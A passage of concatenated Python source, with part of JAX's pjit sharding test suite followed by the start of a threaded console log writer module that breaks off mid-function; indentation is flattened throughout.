def f(*args):
x, *_ = args
return x
f_low = pjit(f, donate_argnums=(0,),
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
f_com = f_low.compile()
f_low.donate_argnums == f_com.donate_argnums == (0,)
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
logging.info('Transfering to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
logging.info('Transfering to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
logging.info('Transfering from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
@jtu.with_mesh([('x', 2)])
def testWithCustomPRNGKey(self):
if not config.jax_enable_custom_prng:
raise unittest.SkipTest("test requires jax_enable_custom_prng")
key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
# Make sure this doesn't crash
pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompile(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
expected = x @ (x + 1)
exe = f.lower(x, x + 1).compile()
actual = exe(x, x + 1)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileWithKwargs(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y, **kwargs):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
NotImplementedError,
"function was compiled by a transformation that does not support "
"keyword arguments, but called with keyword arguments: a, b",
lambda: exe(x, x + 1, a=1, b=2))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileInTreeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
TypeError, "function compiled for .*, called with .*",
lambda: exe([x], [x + 1]))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileArgTypeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
x_f32 = x.astype(jnp.float32)
x_i32 = x.astype(jnp.int32)
exe = f.lower(x_f32, x_f32).compile()
self.assertRaisesRegex(
TypeError,
"Computation compiled for input types:\n.*float32.*\n"
"called with:\n.*int32.*",
lambda: exe(x_i32, x_i32))
class GDAPjitTest(jtu.JaxTestCase):
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_single_output(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x @ x.T
expected_matrix_mul = input_data @ input_data.T
out = f(gda_obj)
self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
self.assertEqual(out.shape, (8, 8))
self.assertEqual(out.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out._global_mesh.shape, {'x': 4, 'y': 2})
for s in out.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
with self.assertRaisesRegex(
ValueError, ('For a non-GDA input, the corresponding resource in '
'in_axis_resources cannot be `pjit.FROM_GDA`.')):
f(input_data)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_multi_input_multi_output(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
mesh_axes1 = P('x', 'y')
gda1 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes1, cb)
mesh_axes2 = P('x')
gda2 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes2, cb)
mesh_axes3 = P(('x', 'y'))
gda3 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes3, cb)
mesh_axes4 = P(None)
gda4 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes4, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(
pjit,
# `FROM_GDA` will be replicated for all the inputs.
in_axis_resources=FROM_GDA,
out_axis_resources=(mesh_axes1, mesh_axes4, mesh_axes2, mesh_axes3))
def f(x, y, z, a):
return x @ x.T, y, z, a
out1, out2, out3, out4 = f(gda1, gda2, gda3, gda4)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertEqual(out1.local_shards[0].index, (slice(0, 2), slice(0, 4)))
self.assertEqual(out1.local_shards[1].index, (slice(0, 2), slice(4, 8)))
self.assertListEqual([s.replica_id for s in out1.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
expected_matrix_mul = input_data @ input_data.T
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 2))
self.assertEqual(out2.local_shards[0].data.shape, (8, 2))
self.assertEqual(out2.local_shards[0].index, (slice(None), slice(None)))
self.assertEqual(out2.local_shards[1].index, (slice(None), slice(None)))
self.assertListEqual([s.replica_id for s in out2.local_shards],
[0, 1, 2, 3, 4, 5, 6, 7])
for s in out2.local_shards:
self.assertArraysEqual(s.data, input_data)
self.assertIsInstance(out3, global_device_array.GlobalDeviceArray)
self.assertEqual(out3.shape, (8, 2))
self.assertEqual(out3.local_shards[0].data.shape, (2, 2))
self.assertEqual(out3.local_shards[0].index, (slice(0, 2), slice(None)))
self.assertEqual(out3.local_shards[1].index, (slice(0, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out3.local_shards],
[0, 1, 0, 1, 0, 1, 0, 1])
for s in out3.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
self.assertIsInstance(out4, global_device_array.GlobalDeviceArray)
self.assertEqual(out4.shape, (8, 2))
self.assertEqual(out4.local_shards[0].data.shape, (1, 2))
self.assertEqual(out4.local_shards[0].index, (slice(0, 1), slice(None)))
self.assertEqual(out4.local_shards[1].index, (slice(1, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out4.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
for s in out4.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_mixed_inputs(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(FROM_GDA, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(gda_obj, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_non_gda_inputs(self):
input_shape = (8, 2)
input_data = np.arange(prod(input_shape)).reshape(input_shape)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(None, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(input_data, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 2), ('y', 2)])
def test_pjit_gda_mesh_mismatch(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x', 'y']
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesRegex(ValueError,
"Pjit's mesh and GDA's mesh should be equal."):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_wrong_resource_for_gda_input(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x']
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesWithLiteralMatch(
ValueError,
"Got an input GDA to pjit with different partitioning than specified "
'in the in_axis_resources argument to pjit. The partitioning must '
'match, or use `jax.experimental.pjit.FROM_GDA` in `in_axis_resources`. '
"Got GDA spec: PartitionSpec('x',) and "
"pjit spec: PartitionSpec('x', 'y') "
'for GDA: GlobalDeviceArray(shape=(8, 2), dtype=float32)'):
@partial(pjit, in_axis_resources=P('x', 'y'), out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_caching(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(input_shape), dtype=np.float32).reshape(input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
input_shape, global_mesh, mesh_axes, cb)
trace_counter = [0]
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=P('x', 'y'))
def f(x, y):
trace_counter[0] += 1
return x @ y.T
f(gda_obj, gda_obj)
self.assertListEqual(trace_counter, [1])
f(gda_obj, gda_obj)
self.assertListEqual(trace_counter, [1])
f(input_data, input_data)
self.assertListEqual(trace_counter, [2])
f(gda_obj, input_data)
self.assertListEqual(trace_counter, [3])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_partition_spec_mismatch_semantically_equivalent(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = [None]
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
with jax._src.config.parallel_functions_output_gda(True):
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
@partial(pjit, in_axis_resources=P(None), out_axis_resources=P(None))
def f(x):
return x
output_gda = f(gda_obj)
# Ensure output_gda._mesh_axes = P() is matched with P(None).
self.assertEqual(output_gda._mesh_axes, ())
# P(None) is in_axis_resources.
f(output_gda)
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleConstraint(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources,)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r".*implies that the size of "
r"its dimension 0 should be divisible by " + mesh_size +
r", but it is equal to 3"):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2)])
def testAxisResourcesMismatch(self):
x = jnp.ones([])
p = [None, None, None]
pjit(lambda x: x, (p,), p)([x, x, x]) # OK
error = re.escape(
r"pjit in_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification (None, None, None) for value "
r"tree PyTreeDef((*, *)). Note that pjit in_axis_resources that are "
r"non-trivial pytrees should always be wrapped in a tuple representing "
r"the argument list.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x, y: x, p, p)(x, x) # Error, but make sure we hint at tupling
# TODO(apaszke): Disable implicit list casts and enable this
# error = re.escape(
# r"pjit in_axis_resources specification must be a tree prefix of the "
# r"corresponding value, got specification (None, None, None) for value "
# r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
# r"are non-trivial pytrees should always be wrapped in a tuple representing "
# r"the argument list. In particular, you're passing in a single argument "
# r"which means that pjit in_axis_resources might need to be wrapped in a "
# r"singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x: x, p, p)([x, x, x]) # Error, but make sure we hint at singleton tuple
error = re.escape(
r"pjit out_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification [[None, None, None], None] for "
r"value tree PyTreeDef([*, *, *]).")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, (p,), [p, None])([x, x, x]) # Error, we raise a generic tree mismatch message
@jtu.with_mesh([('x', 2)])
def testNestedDifferentResources(self):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def f(x):
with mesh(np.array([jax.local_devices()[0]]), ('x')):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def h(x):
return x
return h(x)
xshape = (2, 5, 6)
x = jnp.arange(np.prod(xshape)).reshape(xshape)
with self.assertRaisesRegex(RuntimeError,
"Changing the physical mesh is not allowed.*"):
f(x)
class UtilTest(jtu.JaxTestCase):
def testOpShardingRoundTrip(self):
FakeDevice = namedtuple('FakeDevice', ['id'])
mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
dims = 5
aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)
def roundtrip(spec):
op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
self.assertEqual(parsed_spec[:len(spec)], spec)
self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))
special_specs = [P()]
for spec in special_specs:
roundtrip(spec)
rng = np.random.default_rng(1)
for i in range(100):
spec = [()] * dims
for axis in rng.permutation(mesh_axes)[:rng.integers(low=1, high=len(mesh_axes) + 1)]:
spec[rng.choice(dims)] += (axis,)
roundtrip(P(*spec))
@parameterized.named_parameters(
("linear", {'x': 0, 'y': 1, 'z': 2}, (('x',), ('y',), ('z',))),
("combine", {'x': 0, 'y': 0, 'z': 1}, (('x', 'y'), ('z',))),
("skip", {'x': 0, 'y': 0, 'z': 2}, (('x', 'y'), None, ('z',))),
("multi_skip", {'x': 0, 'y': 1, 'z': 3}, (('x',), ('y',), None, ('z',))),
)
def test_array_mapping_to_axis_resources(self, inp, expected_out):
self.assertEqual(pxla.array_mapping_to_axis_resources(inp), expected_out)
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
consolelogwriter.py
|
"""The console log writer"""
# -*- coding:utf-8 -*-
import os
import queue
import sys
import threading
import time
import traceback
from .mslogconfig import MsConsoleLogConfig
from .msloglevel import MsLogLevels
from .mslogmsg import MsLogMessage
from .mslogwriter import MsLogWriter
__mutex = threading.RLock()
__instances: dict = {}
def __check_mutex(name: str) -> bool:
"""检查数据库文件互斥锁,若互斥,则返回已有的SqliteConnManager实例,否则返回False"""
if name is None:
raise Exception("Param 'name' for dbfi mutex is None or empty")
with __mutex:
if __instances.__contains__(name):
return __instances[name]
else:
return False
def __add_current_instance(inst, name):
"""将当前实例添加到互斥锁集合"""
if inst is None:
raise Exception("Given param 'inst' is invalid")
with __mutex:
if not __instances.__contains__(name):
__instances[name] = inst
def __remove_current_instance(inst):
"""从互斥锁集合中移除当前实例"""
if inst is None:
raise Exception("Given param 'inst' is invalid")
with __mutex:
if __instances.__contains__(inst.name):
__instances.pop(inst.name, None)
def __singleton(cls):
"""单例"""
# __singleton.__doc__ = cls.__doc__
def _singleton(name: str = None, cfg: MsConsoleLogConfig = None):
""""""
with __mutex:
# 检查互斥锁
mtx_result = __check_mutex(name)
if isinstance(mtx_result, cls):
return mtx_result
inst = cls(name, cfg)
__add_current_instance(inst, name)
return inst
_singleton.__doc__ = cls.__doc__
return _singleton
@__singleton
class MsConsoleLogWriter(MsLogWriter):
"""The console log writer"""
# # in console logger, all logger share one _real_log_write thread
# __THREAD_STARTED: bool = False
# __THREAD_LOCKER = threading.Lock()
name = None
config = None
# static_initailed: bool = False
# static_locker = threading.RLock()
# # the queue belongs to consolelogwriter class
# _log_queue: queue.Queue = queue.Queue()
def __init__(self, name: str = None, cfg: MsConsoleLogConfig = None):
if (cfg is None) or (not isinstance(cfg, MsConsoleLogConfig)):
cfg = MsConsoleLogConfig(
cfg.level if cfg is not None else MsLogLevels.DEBUG)
MsLogWriter.__init__(self, name, cfg)
self._timeok: bool = False
self._maxwaittime = 1 # second
# self._timeok_locker = threading.RLock()
self._stdwritebuffer_locker = threading.RLock()
self._stdwritebuffer: list = []
self._t_timer = threading.Thread(
target=self._timer_thread, name="tasktimer", daemon=True)
self._t_write = threading.Thread(
target=self._do_real_log_write,
name="cls_{}_{}".format(type(self).__name__, self.name),
args=())
self._t_flush = threading.Thread(
target=self.__flush_thread,
name="cls_flush_{}_{}".format(type(self).__name__, self.name))
def _timer_thread(self, intervalsec: float = 0.1):
"""定时器,定时分配任务。\n
intervalsec: 轮询间隔,单位秒,默认0.1"""
if not type(intervalsec) in [int, float]:
raise Exception("Timer param inverval sec type wrong.")
if intervalsec < 0 or intervalsec > 10:
intervalsec = 0.1
elapsed: float = 0
while True:
try:
if elapsed >= self._maxwaittime:
self._timeok = True
elapsed = 0
except Exception:
print(
"Task dispatcher timer error: %s" % traceback.format_exc())
finally:
time.sleep(intervalsec)
# 当timeok为True时,表示自上次将timeok设置为true到现在都
# 还没完成一次分配,所以逝去时间elapsed不涨
if not self._timeok:
elapsed += intervalsec
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
pass
def _enqueue_msg(self, msmsg: MsLogMessage):
"""Enqueue the message object to queue"""
self._log_queue.put(msmsg)
def _start_thread(self):
"""start one writing thread"""
if self._thread_started:
return
with self._t_start_locker:
if self._thread_started:
return
self._t_timer.start()
self._t_write.start()
# self._t_flush.start()
if self.config.debug:
tdebug = threading.Thread(target=self._debug_log)
tdebug.start()
self._thread_started = True
def _debug_log(self):
while True:
try:
print('{} {}:{}'.format(self._t_write.name, self.name,
self._log_queue.qsize()))
except Exception:
traceback.print_exc()
finally:
time.sleep(10)
def _do_real_log_write(self):
"""The log write thread. The subclass implementation should do the
real log write"""
got = False
while True:
try:
